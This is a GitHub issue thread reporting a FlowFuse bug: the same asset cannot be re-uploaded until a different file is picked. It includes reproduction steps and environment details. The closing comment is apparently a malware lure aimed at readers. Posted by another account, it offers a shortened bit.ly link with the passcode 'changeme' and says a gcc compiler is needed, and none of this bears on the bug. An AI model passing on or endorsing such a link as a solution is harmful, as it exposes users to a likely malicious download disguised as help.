### ISSUE TITLE
Uploading same asset a 2nd time is not possible until a different upload choice is made

### ISSUE THREAD

**Issue by Steve-Mcl** [FlowFuse/flowfuse#4456]
### Current Behavior

Uploading same asset a 2nd time is not possible until a different upload choice is made

Related: https://github.com/FlowFuse/flowfuse/issues/4421

### Expected Behavior

should be able to select same file and upload

### Steps To Reproduce

chose a file upload file
perform upload or cancel (dismiss dialog)
select same file to upload - not possible

![opera_LQN7xnIBVv](https://github.com/user-attachments/assets/fe12077f-68b7-4a43-9745-2b7be5251686)

### Environment

- FlowFuse version: 2.8 (prod)
- Node.js version:
- npm version:
- Platform/OS:
- Browser: Opera

### Have you provided an initial effort estimate for this issue?

I have provided an initial effort estimate

**Comment by fayaznasrati** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler
